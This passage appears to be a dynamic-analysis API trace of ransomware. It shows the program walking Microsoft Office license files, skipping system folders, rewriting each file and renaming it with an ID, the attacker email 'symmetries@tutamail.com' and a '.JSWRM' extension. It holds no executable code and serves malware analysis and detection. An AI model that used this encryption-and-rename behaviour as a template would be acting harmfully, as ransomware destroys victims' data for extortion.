lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0110.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.242] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11514) returned 1 [0110.242] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2cf0) returned 0x24c1d0 [0110.242] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2cf0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2cf0, lpOverlapped=0x0) returned 1 [0110.246] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.246] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2cf0, lpOverlapped=0x0) returned 1 [0110.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.246] CloseHandle (hObject=0x45c) returned 1 [0110.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0110.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0110.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0110.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0110.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0110.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0110.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0110.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0110.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.247] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0110.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0110.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0110.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.248] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb6ec7d0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb6ec7d0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb8dc6bb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardMSDNR_Retail-pl.xrm-ms", cAlternateFileName="STDA28~1.XRM")) returned 1 [0110.248] lstrcmpiW (lpString1="StandardMSDNR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0110.248] lstrcmpiW (lpString1="StandardMSDNR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0110.248] lstrcmpiW (lpString1="StandardMSDNR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0110.248] lstrcmpiW (lpString1="StandardMSDNR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0110.248] lstrcmpiW (lpString1="StandardMSDNR_Retail-pl.xrm-ms", lpString2="recovery") returned 1 [0110.248] lstrcmpiW (lpString1="StandardMSDNR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0110.248] lstrcmpiW (lpString1="StandardMSDNR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0110.248] lstrcmpiW (lpString1="StandardMSDNR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.248] lstrcmpiW (lpString1="StandardMSDNR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0110.248] lstrcmpiW (lpString1="StandardMSDNR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0110.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0110.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0110.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241100, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardMSDNR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0110.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0110.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0110.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f70, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardMSDNR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0110.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0110.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0110.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0110.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.249] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10655) returned 1 [0110.249] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0110.249] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0110.251] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.252] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0110.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.252] CloseHandle (hObject=0x45c) returned 1 [0110.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0110.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0110.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0110.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0110.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0110.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0110.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.252] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0110.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0110.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0110.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0110.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0110.253] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb5e174f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb5e174f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb6ec7d0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x583b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardMSDNR_Retail-ppd.xrm-ms", cAlternateFileName="STANDA~4.XRM")) returned 1 [0110.253] lstrcmpiW (lpString1="StandardMSDNR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0110.253] lstrcmpiW (lpString1="StandardMSDNR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0110.253] lstrcmpiW (lpString1="StandardMSDNR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0110.253] lstrcmpiW (lpString1="StandardMSDNR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0110.253] lstrcmpiW (lpString1="StandardMSDNR_Retail-ppd.xrm-ms", lpString2="recovery") returned 1 [0110.253] lstrcmpiW (lpString1="StandardMSDNR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0110.253] lstrcmpiW (lpString1="StandardMSDNR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0110.253] lstrcmpiW (lpString1="StandardMSDNR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.254] lstrcmpiW (lpString1="StandardMSDNR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0110.254] lstrcmpiW (lpString1="StandardMSDNR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0110.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0110.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0110.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0110.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241290, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardMSDNR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0110.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0110.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0110.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0110.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241308, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardMSDNR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0110.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0110.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0110.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0110.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.255] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22587) returned 1 [0110.255] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5830) returned 0x24c1d0 [0110.255] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5830, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5830, lpOverlapped=0x0) returned 1 [0110.258] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.258] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5830, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5830, lpOverlapped=0x0) returned 1 [0110.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.258] CloseHandle (hObject=0x45c) returned 1 [0110.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0110.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0110.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0110.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0110.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0110.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0110.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.259] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0110.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0110.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0110.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0110.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0110.260] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb6079a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb6079a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb712a03, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d55, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardMSDNR_Retail-ul-oob.xrm-ms", cAlternateFileName="STAD1B~1.XRM")) returned 1 [0110.260] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0110.260] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0110.260] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0110.260] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0110.260] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0110.260] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0110.260] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0110.260] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.260] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0110.260] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0110.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0110.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0110.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardMSDNR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0110.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0110.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0110.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0110.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=34, 